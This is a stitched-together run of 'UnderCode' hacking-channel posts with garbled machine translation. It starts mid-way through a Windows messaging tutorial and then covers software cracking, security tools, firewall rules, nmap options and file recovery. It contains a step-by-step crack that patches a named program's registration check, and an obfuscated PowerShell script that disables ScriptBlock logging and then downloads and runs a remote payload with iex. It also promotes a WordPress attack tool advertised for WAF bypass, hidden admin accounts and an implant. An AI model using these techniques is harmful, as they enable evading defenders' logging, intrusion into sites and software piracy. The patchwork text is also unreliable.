message, sMsg.wParam, sMsg.lParam);

}

}

return 0;

}

7) Can everyone understand how to play this game? Run "routine 1" wnd first, then run the console program msg. msg will find the window of wnd and send its main thread ID to wnd. After receiving the msg message, wnd will display it. At this point, wnd and msg have established communication channels: wnd can send messages to msg's main thread, and msg can send messages to wnd's window.

8) If we press the key '1' in the wnd window, wnd will send message 1 to msg. After receiving msg, we will get the window name of wnd and display it through WM_GETTEXT message. If we press the key '2' in the wnd window, wnd will send message 2 to msg. After receiving msg, we will modify the window name of wnd through the WM_SETTEXT message.

9) This small example demonstrates the message loop of a console program, sending messages to threads, and communicating messages between processes.

10) The problem of address space
Different processes have independent address spaces. If we include the address of a process A in the message parameters, then send it to process B. If process B operates on this address in its own address space, an error will occur. So why does WM_GETTEXT and WM_SETEXT in the above example work properly?

This is because WM_GETTEXT and WM_SETEXT are messages defined by Windows itself. Windows knows the meaning of the parameters and does special processing, that is, allocate a block of memory in the space of process B as a relay, and in the buffer of process A and process B Copy data from time to time. For example: In the example in Section 1.5.1, if we set a breakpoint to observe, we will find that lParam in the WM_SETTEXT message sent by msg is not equal to lParam in the WM_SETTEXT message received by wnd.

11) If we pass the memory address in the message defined by ourselves, the system will not do any special processing, so an error must occur.

Windows provides a WM_COPYDATA message to pass data to the window, and Windows also does special processing for this message.

12) When sending messages between processes that require additional memory allocation, we should use SendMessage instead of PostMessage. Because SendMessage will wait for the receiver to finish processing before returning, so the system will have the opportunity to release the allocated memory. If PostMessage is used in this case, the system will ignore the message that needs to be delivered. The reader can experiment with it in the msg program.

🦑 Subclassing and superclassing A
window class is a template for a window, and a window is an instance of a window class. Window class and

temporarily)

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 how to crack the software registration code full by UnderCode :
twitter.com/undercodeNews :

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

for who have never been exposed to software cracking or programming.
> Let ’s start today ’s crack,

> The software I want to crack: The software needed for the network form terminator to

1) shell language.exe

2) shelling AspackDie.exe

3) decompile W32Dasm gold - version
hex editor UltraEdit.rar

🦑 Review the basics before cracking:
I. Cracked Level

> Beginner, modify the program, modify the exe file with ultraedit, called brute force cracking, referred to as blasting
intermediate,@ undercodeTesting chase the registration code of the software
advanced, write the registration machine

🦑 General steps for cracking with w32dasm:

1) Look at the software manual, what is the difference between software registration and non-registration, and how to register

2) Run this software, try to enter your name and any registration code to register, what are the error messages, and the error messages Write it down

3) Detect if there is shelling .

4) pw32dasmgold disassembly

5) Find the error message or the correct message may be correct mouse button

6) pw32dasmgold main window corresponding assembler analysis, to identify the key and key jump Call

7) the green light of the stop key in the jump, jump to find the key offset address at the bottom of the main window pw32dasmgold (actually modify the address)

8) Using ultraedit to find the offset address (actually modify the address) modify the machine code and save

🦑 The concept of the shell: copyright information needs to be protected, do not want others to change it, exe executable file compression, the most common shell software ASPACK, UPX, PEcompact

> Unpacking: Get a software to detect its shell, and then we need to unpack its shell to restore its original appearance. If it is not packed, it will not be necessary to unpack it. Unpacking software unaspack, caspr, upx, unpecompact, procdump

> Actually modify address (offset address) and the row address (virtual address) pw32dasmgold out disassembly code consists of three columns
of the first column of the row address (virtual address)

> in the second column machine code (modified in the final modified ultraedit)
the third column Assembly instruction

1) First column Second column Third column
: 0041BE38 2B45F0 sub eax, dword ptr [ebp-10]
: 0041BE3B 6A42 push 00000042
: 0041BE3D 50 push eax
: 0041BE3E FF75F4 push [ebp-0C]
: 0041BE41 FF75F0 push [ebp-10]
: 0041BE44 FF35A8AB4400 push dword ptr [0044ABA8]


2) Different modification methods
for two different situations :

a) Modify to jmp
je (jne, jz, jnz) => jmp corresponding machine code EB (the first jump found in the error message upward) jmp's role is to jump absolutely and unconditionally To skip the error message below

b) Modify to nop
je (jne, jz, jnz) => nop corresponding machine code 90 (the first jump found with the correct information upward) The role of nop is to erase this jump, make this jump invalid, and lose Function, so that the program smoothly comes to the correct information immediately following it.

🦑 Alright, let's start our cracking journey. . . . . . . . . .

1) Investigate the shell: First open the language.exe of the detect shell, and select Open ---- find the network fill-in terminator to be cracked: FormGhost.exe, click OK, as shown in Figure 1. language.exe shows that the software shell is: Aspack

2) Unpacking: Double-click the unpacked AspackDie.exe, a dialog box appears, select the network form filling terminator: FormGhost.exe, and open

3) Terminate the form in the network: FormGhost.exe generates an unpacked.exe file in the same directory. This is the unpacked FormGhost.exe.

4) start disassembly: open the decompile W32Dasm Gold-official version is chineese version, select disassembly-open the unpacked.exe after unpacking, and start to load

5) start to modify the software: open the hexadecimal editor UltraEdit.

rar, (a bit slow)

>Open unpacked.exe after unpacking, directly press ctrl + g, a dialog box appears, enter 0xacb4b (that is, the offset address, not the preceding 000)

6)close all software, run the unpacked222.exe saved, click help --- registration, registration name, registration code to add casually, click OK, and prompt registration completion. Figure 21. Go back to the software interface and look at the help. The registration item has been grayed out

🦑 The cracking is all completed

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PowerShell ScriptBlock Log Bypass by underCode :
twitter.com/undercodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) As with any logging service, ScriptBlock logging is controlled using Group Policy settings. PowerShell queries it every time it detects a new ScriptBlock to determine if it needs to be registered. But the fact is that PowerShell executes the request once, caches it in memory and returns it every time it is accessed.

2) Thus, these parameters can be easily changed using the following code.

$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)

$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] =

$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0

3) These actions can be performed without administrator privileges and without touching the registry, which allows us to do this discreetly. But there is one limitation.

4) New policies are applied after checking the parameters that will be viewed when the first ScriptBlock is completed, which will lead to the registration of the event. Therefore, this trigger ScriptBlock should be as obfuscated as possible and should not carry any payload. That is, it is performed specifically to complete logging.

$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
$GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://server/payload.ps1")


5) The above script executes a trigger for the log, checks the logging parameters and launches the payload bypassing logging.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑you can /upload this scripts to git repo and start some helpful script, with few customization

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The Latin, this script automatically install any package for pentest with uptodate tools , and lazy command for run the tools like lazynmap , install another and update to new #actually for lazy people hahaha #and Lalin is remake the lazykali with fixed bugs , added new features and uptodate tools . It's compatible with the latest release of Kali
pinterest.com/undercodeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/Screetsec/LALIN

2) cd LATIN

3) $ sudo chmod +x Lalin.sh

4) $ sudo ./Lalin.sh

🦑Tested by UnderCode

> kali, on GNOME desk

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Updated 2020 generate and search pattern string for exploit development
twitter.com/unDERCODENews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/Svenito/exploit-pattern

2) cd exploit-pattern

3) Generate a pattern

$> pattern.py 100
Aa0Aa0Aa1Aa1Aa2Aa2Aa3Aa3Aa4Aa4Aa5Aa5Aa6Aa6Aa7Aa7Aa8Aa8Aa9Aa9Ab0Ab0Ab1Ab1Ab2Ab2Ab3Ab3Ab4Ab4Ab5Ab5Ab6A

4) Search for a pattern
$> pattern.py Bf4B

5) Pattern Bf4 first occurrence at position 942 in pattern.
$> pattern.py 0x42346642
Pattern 0x42346642 first occurrence at position 942 in pattern.

6) Use it in your own python code
After placing pattern.py in the same directory as your script:

from pattern import pattern_gen

print(pattern_gen(10))
or

from pattern import pattern_search

found_at = pattern_search('Bf4B')

@underCodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 New 2020 wordpress hack script for linux-termux :
T.me/UnderCodeTesting

>Features :

1) Bypass WAF(Web application firewall)

2) Hidden/Stealth

3) Let's you login to any user

4) Dump entire user entries

5) Create a persistent admin account that is hidden

6) Obfuscated implant

7) Multi-functionality

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/shadowlabscc/ProjectOpal.git

2)cd ProjectOpal

3) python opal.py

@underCodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Popular instagram sites-Trials-Passwords not Required :
THOSE ARE MOST POPULAR BUT NOT TESTED BY UNDERCODE :
fb.com/underCodeTesting

> https://famoid.com/buy-instagram-followers/

> https://www.followerpackages.com/buy-instagram-followers/

> https://www.genuinelikes.com/buy-instagram-followers.php

> https://www.getrealboost.com/buy-real-instagram-followers/

> https://krootez.com/buy-real-instagram-followers/

> https://buyiglikesfast.com/

> https://cheapigfollowers.com/

> https://friendlylikes.com/

> https://brsm.io/buy-real-active-instagram-followers/


🦑 There is also 100000 sites But we choosed most popular services-
🦑If Site Trial not avaible-Try after few hours :)

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Enhance network security with SYN packet characteristics BY uNDERcODE :
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Consider the following situation: the
internal network is 198.199.1.0, and Linux is used as a router and firewall to connect to the Internet. On the firewall, eth0 is connected to the external network and eth1 is connected to the internal network.

2) For the security of the www service, set the following set of ipchains rules:
ipchains -A input -p tcp -s 198.199.1.0/24: 1024 -d 0.0.0.0/0 www -i eth1 -j ACCEPT

3) ipchains -A input -p tcp -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT

4) In the above settings, only internal users are allowed to access www hosts on the Internet with ports above 1024 (undefined ports) In other words, allow a port greater than 1024 on the intranet host and port 80 on the Internet to establish a connection. Imagine that this would allow hosts on the Internet to use port 80 to connect to a port on your intranet host that is greater than 1024. From this we can see that the system has security risks because there are many services with service ports greater than 1024. So, how to overcome this hidden danger, we can use the characteristics of the SYN packet to eliminate this hidden danger.

5) First let's take a look at the flag bits in the TCP data segment header. TCP has six flags, which are: URG, ACK, PSH, RST, SYN, and FIN. Let's focus on the ACK, SYN and FIN flags.

6) ACK: indicates whether the confirmation number is legal, 1 indicates legality, 0 indicates that the confirmation number is invalid. The acknowledgment number refers to the next byte that is expected to be received instead of the previously received byte. It can be seen that the ACK of the packet that initiates the connection establishment request (that is, the first guarantee) is always set to 0, and the subsequent packets are always set to 1.

7) SYN: used to establish a connection. In the connection request, SYN = 1, and in the connection request confirmation, SYN = 1. Therefore, SYN stands for CONNECTION REQUEST and CONNECTION ACCEPTED. In subsequent TCP packets, SYN is always set to zero.
FIN: Used to cancel the connection.

8) The above can be summarized with the following table:

ACK flag SYN flag meaning of the TCP packet
0 1 connection request
1 1 connection request confirmation (accept connection request)
1 0 confirmation connection request confirmation
1 0 data packet
... ...

9) What we call a SYN packet is a connection request packet. As shown above, the SYN packet has the following characteristics: SYN = 1, ACK = 0, FIN = 0. Therefore, in order to filter connection request packets, it is only necessary to filter out SYN packets.

10) In ipchains, we can specify SYN packets like this:
-p tcp -s xxxx / x -y
If we can define all SYN packets from 192.168.1.0 like this:
-p tcp -s 192.168.1.0/24 -y
we can also Prefix -y with! To define all non-SYN packets:
-P tcp -s xxxx / x! -Y

🦑 So, in the above example, we can enhance the security of the network like this:

ipchains -A input -p tcp -s 198.199.1.0/24: 1024 -d 0.0.0.0/0 www -i eth1 -j ACCEPT
ipchains -A input -p tcp! -y -s 0.0.0.0/0 www -d 198.199.1.0/24 1024: -i eth0 -j ACCEPT

This will prevent hosts on the Internet from connecting to hosts on your intranet using port 80 A port greater than 1024, thereby achieving the purpose of enhancing network security.

References:
1) IPCHANIS-HOWTO
2)Internet firewall domain network security
3) Computer network

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Full UnderCdoe Tutorial: Nmap Network Security Scanner Instructions
PART 1

instagram.com/underCodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

-i
Read data from the specified file instead of the command line. This file can store a list of hosts or networks, separated by spaces, TAB keys, or newlines. If you want to read from a standard input device (file)-for example, at the end of a pipe character, you need to use a hyphen (-) for the file name. You can find more information on writing this document in the target specifications.

The -p
parameter can specify the port you want to scan. For example, '-p 23' will only detect the port 23 of the host. The default scan is from 1 to 1024, or you can use the nmap A list of ports in the services file.

-F Quick scan mode. Specify that you want to scan only the ports in the port list listed in the services file provided in nmap. This is significantly faster than scanning all 65535 ports.

-D
This is a scan with deceptive mode. All the deceptive addresses you specify will be recorded in the remote host's connection record. In this case, their data storage will show that some port scans are initiated from an IP, but they cannot distinguish which is the real IP and which is used as a cover. This can defeat some of the behavior of tracking through routes, so It is a very practical technique to hide your IP. Separate each spoofed address with a comma. You can freely put 'me' in any place where you want to display the real IP. If you put 'ME' in the sixth place or even last, some port scan recorders (such as Solar Designer's excellent scanlogd) may not show your IP at all, if you don't use 'ME', nmap will place it randomly. Remember that the host you are using to scam must be open or you can scan your target half-open. Because it's fairly easy to tell which real intruder is from a bunch of IP addresses that are actually useless. You may also want to use the IP address instead of the name, so that the host's nameserver logs will not record you. Also remember that some (stupid) \ "port scan probes \" will refuse port scan attempts to the host. In this way, you will inadvertently cause the loss of the connection between the host you scanned and the "phishing host", which may bring a big problem-if the "phishing host" is an online gateway or even its local The machine will be disconnected as well! So you better use this parameter carefully-for moral reasons-it's just a scam, isn't it? This spoofing can be used in the initial ping scan (using ICMP, SYN, ACK or other) and the actual port status scan. It can also be used for remote OS identification (-O). Of course, if you write too many decoy addresses, it is useless, which can only slow down the scanning speed and reduce some accuracy. And some instruction processing systems may filter out your spoofed packets, although most (almost all) do not place any restrictions on spoofed packets.

-S
Under certain circumstances, nmap may not be able to determine your source address-in this case nmap will prompt, then you need to use -S with IP address to label. Another possibility is to trick the target into thinking that someone is scanning it. Imagine that a company finds constant scanning by competitors :), this is an unsupported usage, or rather, not the main purpose. I just use it to remind people not to blame when they find a port scanner. Maybe he is innocent. -e can explain the general usage of this parameter.

-e
tells nmap which interface to send or receive. nmap can detect it automatically, and if it can't, it will prompt you.

PART 2 NMAP FULL

-g
Set the source port number in the scan. Many "naive" firewalls or packet filters, except for the ones they establish that allow DNS (53) or FTP-DATA (20) packets to come in to establish a connection, are generally filtered. Obviously this is a very thoughtless approach, because intruders can Easily edit a source port from FTP or DNS. For example, if you cannot get information from a host's host: port through TCP ISN, then by using the -g command, nmap will change the source port and try again. It should be understood that there may be a small delay in using this option, because I sometimes need to store useful information in the source port number.


-M
sets the maximum number of sockets for parallel TCP connect () scans (default) . This is quite effective for moderately slowing down the scan, it can avoid crashing the remote host. Another way is to use -sS.


Timing options
-------- *

Although nmap is generally able to complete the scanning task as quickly as possible in runtime, there are occasionally some hosts / ports that cannot be detected. This may be The default time strategy of nmap is not consistent with your goal (equivalent to the setting of timeout). Here are some options to control the scanning time:

-T
This is a parameter setting that can be used to conveniently express the priority of the nmap time policy. Paranoid mode scans at extremely slow speeds to avoid recording by digital recording systems. It makes scans continuous rather than concurrent and usually waits at least five minutes before sending a packet. Sneaky is similar, except that it sends a packet every 15 seconds. Polite mode is used to reduce the network load to reduce the possibility of crashes. It continuously sends probes and waits for 0.4 seconds between the two packets. Normal is the normal usage of nmap, and it does its best to scan as fast as possible-unless the host or port connection is lost. In Aggressive mode, a five minute timeout is set for each host, and each probe waits for no more than 1.25 seconds. Insane mode is for adapting to very fast networks or you don't care about losing some information-because it's too fast! Its timeout is set to 75 seconds and it only waits for 0.3 seconds for a response. It allows "sweeping" a fast network system :). You can also use numbers (0-5) to represent parameters, such as' -t 0 'Means Paranoid and' -t 5 'stands for Insane mode. Note that these time settings cannot be combined in the underlying control. (NOT be used in combination with the lower level controls given below.)

--Host_timeout
specifies the total scan time of nmap for a certain IP. If it exceeds, it will not be processed. The default is not set.

--max_rtt_timeout
specifies the maximum time for nmap to respond to a probe from the remote end. The default is 9000.

--initial_rtt_timeout
specifies the timeout time of the initial probe. This is usually effective when scanning hosts protected by a firewall with -P0. nmap will get a good RTT assessment and a few initial probes by pinging. The default value is 6000.

--max_parallelism
Specify the maximum number of parallel scans allowed by nmap. Set to 1 to indicate that nmap scans only one port at a time. It will also affect other scans such as ping sweep, RPC scan, etc.

--scan_delay
specifies the minimum time between two probes that nmap must wait. This is a way to reduce the network load and make scanning less visible under the records of the integrated data store.

Target description
-------- *

All options without parameters will be regarded as the target host description of nmap. The simplest example is just listing a single host name or IP address on the command line. If you want to scan a subnet of an IP address, you can add '/ mask' to the host name and IP address. The mask must be between 0 (scanning the entire network) and 32 (specific single host). Use / 24 to scan for a class C address, and / 16 to scan for a class B address
...

nmap also has some more useful symbolic explanations that let you use list / ranges to specify IP addresses for each element. For example, if you want to scan a class B URL 128.210. *. *, You can use '128.210. *. *' Or '128.210.0-255.0-255' or even '128.210.1-50,51-255.1,2,3 , 4,5-255 '. Of course, you can also use the mask mentioned above: '128.210.0.0/16'. All of these are equivalent. Remember that most shells require delimiters such as quotes when you use '*'.

Another interesting thing is that you can "split" the entire network in other ways. For example, you can use '*. *. 5.6-7' to scan all IP addresses ending in .5.6 or .5.7. For more information, you can look at the example section.

Scanning example
-------- *

Here are some examples of scanning using nmap, from the simplest to the most complex ones. Note that there are real numbers and some real domain names-this makes the scanning behavior more specific. Here you can replace the addresses / names with your own network name. Although the analysis of the results of the port scan may make some people vulnerable, I don't think it is illegal. I have scanned hundreds or thousands of machines but received only one complaint. But I am not a lawyer and some people are annoyed by nmap detection, so it is best to scan or-risk after getting permission, the consequences are at your own risk.

nmap -v target.example.com

scans all reserved TCP ports on target.example.com in this way, -v means use verbose mode.

nmap -sS -O target.example.com/24

This will start a half-open scan of SYN. ​​The target is the class C subnet where target.example.com is located. It also tries to determine what system is running on it. . This requires root privileges because it uses half-open scanning and system detection.

nmap -sX -p 22,53,110,143,4564 128.210. *. 1-127

Send a Xmas tree to scan within half of the subnet where Class B 128.210 is located. We will check whether the system is running sshd, DNS, pop3d, imapd, or port 4564. It should be noted that due to the imperfectness of the Microsoft TCP stack, Xmas scanning will not run successfully on its platform. The same problem may exist in CISCO, IRIX, HP / UX, and BSDI.

nmap -v -p 80 '*. *. 2.3-5'

This is a way to locate a domain (divide the entire network into many small parts) and then scan. All IP addresses ending in .2.3, .2.4, or .2.5 are scanned here. You can also use -sS if you are ROOT. Similarly, you can search for more interesting machines starting from 127. You can replace the preceding asterisk with '127-222'-IMHO, there are a lot of interesting machines in that area.

host -l company.com | cut '-d' -f 4 | ./nmap -v -i-

do a DNS zone transfer to find the host on company.com and send the IP address to nmap (feed the IP addresses to nmap). This command runs under my GNU / Linux platform, you may need to use different option parameters or different operating systems.


Bedbugs-
*
bugs? What's wrong? If you find it, please tell me, the revised version will be more perfect :), remember to give it to me along with the "fingerprints" of the OS, so that I can have enough data to modify ...

Author
---- *

Fyodor

issued
---- * The

latest version of nmap can be obtained from the following URL (the following is the copyright information)

http://www.insecure.org/nmap/

nmap is (C) 1997, 1998, 1999 by Fyodor ( fyodor@dhp.com , fyodor@insecure.org )

libpcap is also distributed along with nmap. It is copy-righted by Van Jacobson, Craig Leres and Steven McCanne, all of the Lawrence Berkeley National Laboratory, University of California, Berkeley, CA. The Version distributed with nmap may be modified, Pristine sources are available fromftp: //ftp.ee.lbl.gov/libpcap.tar.Z.

NMAP 3

This program is free software; you can redistribute it and / or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; Version 2. This guarantees your right to use, modify, and redistribute Nmap under certain conditions. If this license is unacceptable to you, Insecure.Org may be willing to sell alternative licenses (contact fyodor@dhp.com ).

🦑This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details (it is in the COPYING file of the nmap distribution).

It should also be noted that Nmap has been known to crash certain poorly written applications, TCP / IP stacks, and even operating systems. Nmap should never be run against mission critical systems unless you are prepared to suffer downtime. We acknowledge here that Nmap may crash your systems or networks and we disclaim all liability for any damage or problems Nmap could cause.

All versions of Nmap equal to or greater than 2.0 are believed (through informal testing) to be Year 2000 (Y2K) compliant in all respects. That being said, we reiterate that Nmap comes with no warranty. There is no reason to believe versions earlier than 2.0 are susceptible to problems, but we have not tested them.


Attached:

The operating platform of nmap
-------------- *

Portability
NMAP is developed under LINUX, but now it can be used on many platforms Run on. Thanks to Lamont Granquist for his great help in running the NMAP automated console on many platforms I can't access. The following is a brief list of systems that support NAMP:

OS Compiles TCP scan (-sT) SYN scan (-sS) FIN scan (-sF) Frag scan (-f) OS Detection (-O)
Linux Yes! Yes! Yes! Yes! Yes! Yes!
FreeBSD Yes! Yes! Yes! Yes! Yes! Yes!
OpenBSD Yes! Yes! Yes! Yes! Yes! Yes!
NetBSD Yes! Yes! Yes! Yes! Yes! Yes!
Solaris 2.4-7 Yes! Yes! Yes! Yes! No :( Yes!
SunOS 4.1.4 w / gcc Yes! Yes! Yes! Yes! No :( Yes!
IRIX 5.3-6.4 Yes! Yes! Yes! Yes! No: (Yes!
HP / UX 10.20 Yes! Yes! Yes! Yes! Yes! Unknown
BSDI 2.1 and up Yes! Yes! Yes! Yes! Unknown Yes!
AIX (use cc, not gcc) Yes! Yes! No :( No: (No :( No :(
Digital UNIX / Alpha Yes! Yes! POSSIBLE KERNEL PANIC!
Cray UNICOS 10.0 Yes! Yes! No :( No :( No :( No :(

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NMAP A> Z BY UNDERCODE

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Miscellaneous Tools-Recover Deleted Files in ext2 File System :
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) if you accidentally accidentally deleted an important file, such as rm -rf kkk And kkk is a very important file for you, you must be very painful, at this time you must not panic, you should stop writing any files to your hard disk immediately. It is completely recoverable. (I wrote the following specifically for the ext2 file system, other file systems have methods, I will write later):
#debugfs / dev / hda1 (the partition where the deleted file is located)
debugfs: lsdel
can list your recent The inode table of the deleted file is roughly as follows:

2) Inode Owner Mode Size Blocks Time deleted

3) This is the node table number, owner, file attributes (that is, read, write, etc.), size, block (generally 1block = 1K), when deleted time. With this information, you should be able to quickly determine which file you want to recover. Then use
debugfs: dump <the value of the inode table you want to restore> / home / directory (to that directory)
OK! It's that simple, you can find it in / home / directory.

4) Of course, if you have a lot of files, doing this one by one is definitely troublesome, you can download some tools. I give it here:
http://revocer.sourceforge.net/linux/recover.
Everyone, try it. If you have any difficulties, please send here,

5) During the practice of the brothers, such information appeared, and they did not know how to deal with it. Please enlighten me.
311543 0 100600 7603556 14/14 Wed Oct 2 18:39:21 2002
586046 0 100644 7044 2/2 Wed Oct 2 18:51:50 2002
760593 0 100600 363 1/1 Wed Oct 2 18:53:35 2002
9551 deleted inodes found.
debugfs: dump 311543
dump: Usage: dump_inode [-p] <file> <output_file>
debugfs: dump 311543 / root
311543: File not found by ext2_lookup
debugfs:

6)wants to restore this 311543 because I am in the / root directory I deleted a file, I saw it was 311543, but using the following command to restore, the above prompt appeared

7) You should be like this.

Debugfs: dump <311543> / root / ppp (any file name).
Try again . Did you

succeed?

8) I am now under windows, and my linux is JFS. Recovery is more convenient. Etc. Will I switch to LINUX and build an ext2 system, I have tried it before, and it must be


9) ok . Dude is terrific, serve it, and it will be OK. . . .
Now my brother has a question: I deleted a .tar.gz file, but after the restoration is complete, I cannot use
#tar zxvf * tar.gz to extract it.

10) The other is how to restore the original file name. For example, I deleted wine.tar.gz, but I ca n’t remember what the specific file name is, but I want to restore the original file name, such as I deleted important files in the system, but I don't remember what kind of file name it is, but this file name is extremely important to the system, such as mozilla under / usr / bin. How can I do this? ?

11) The main reason is to know why. The answer is simple. To know the file name, use
debugfs: ls -d.

12) As for the file cannot be used, it is because the dump is a continuous block, and your file may not be a continuous block.
Use debugfs: stat <inode> to see its status, and then dd them down one by one (of course there are tools to save a lot of effort).

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁